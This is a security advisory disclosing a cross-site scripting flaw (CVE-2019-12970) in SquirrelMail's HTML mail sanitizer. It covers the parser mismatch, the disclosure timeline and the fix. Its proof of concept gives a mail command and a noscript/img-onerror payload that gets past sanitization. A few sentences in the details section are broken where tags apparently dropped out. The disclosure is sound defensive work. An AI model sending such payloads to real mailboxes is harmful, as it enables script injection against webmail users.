Advisory ID: SYSS-2019-016 (update 1) Product: SquirrelMail Manufacturer: The SquirrelMail Project Affected Version(s): 1.4.22, SVN Tested Version(s): SVN Vulnerability Type: Cross-Site Scripting (CWE-79) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2019-04-17 Solution Date: 2019-07-24 Public Disclosure: 2019-07-01 CVE Reference: CVE-2019-12970 Author of Advisory: Moritz Bechler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: SquirrelMail is a open-source webmail package. The manufacturer describes the product as follows (see [1]): "SquirrelMail is a standards-based webmail package written in PHP. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support, address books, and folder manipulation." Due to insufficient HTML sanitization, SquirrelMail is vulnerable to Cross-Site-Scripting when viewing HTML mails. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: When viewing e-mails in HTML mode (not active by default) SquirrelMail applies a custom sanitization step in an effort to remove possibly malicious script and other content from the viewed e-mail. Due to improper handling of RCDATA and RAWTEXT type elements, the HTML parser used in this process shows differences compared to real user agent behavior. Exploiting these differences JavaScript code can be introduced which is not removed. Due to the blacklisting nature of this mechnanism, multiple such element types are allowed and not correctly handled, including the elements , <noframes>, <noscript> and <textarea>. When using a construction like <noembed> <p title="">

SquirrelMail's parser will consider the included tag as part of the title attribute and therefore does not sanitize its contents. However, correctly parsing this, the element ends at the first closing tag and the <img> tag is actual content. This allows having otherwise forbidden elements and attributes, including ones containing malicious JavaScript code. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Send an HTML e-mail to a victim user: attacker> mail -a "Content-type: text/html" -s "My little pony" \ victim@example.com <<EOD <html><head></head><body> <noscript> <p title="</noscript><img src=x onerror=alert(1)>"></p> </noscript> </body></html> EOD Viewing the recieved e-mail in HTML format the following HTML code is produced. This code is interpreted by common browsers in a way that the <img> tag with its onerror handler is a regular tag, and the embedded JavaScript code is executed. <!-- begin sanitized html --> <div class="bodyclass"><noscript><p title="</noscript> <img src="SquirrelMail_files/x.html" onerror="alert(1)">"&gt;<p></p> </div> <!-- end sanitized html --> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update to 1.4.23-svn/1.5.2-svn. Disable HTML viewing of messages. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2019-04-03: Vulnerability discovered 2019-04-17: Vulnerability reported to manufacturer 2019-05-03: No response, second attempt to contact manufacturer 2019-07-01: No response, public disclosure of vulnerability 2019-07-21: Initial contact by developers 2019-07-24: Issue has been fixed, original reports were lost due to misconfiguration of security contact address ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for SquirrelMail http://squirrelmail.org/ [2] SySS Security Advisory SYSS-2019-016 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-016.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Bechler of SySS GmbH. E-Mail: moritz.bechler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc Key ID: 0x768EFE2BB3E53DDA Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en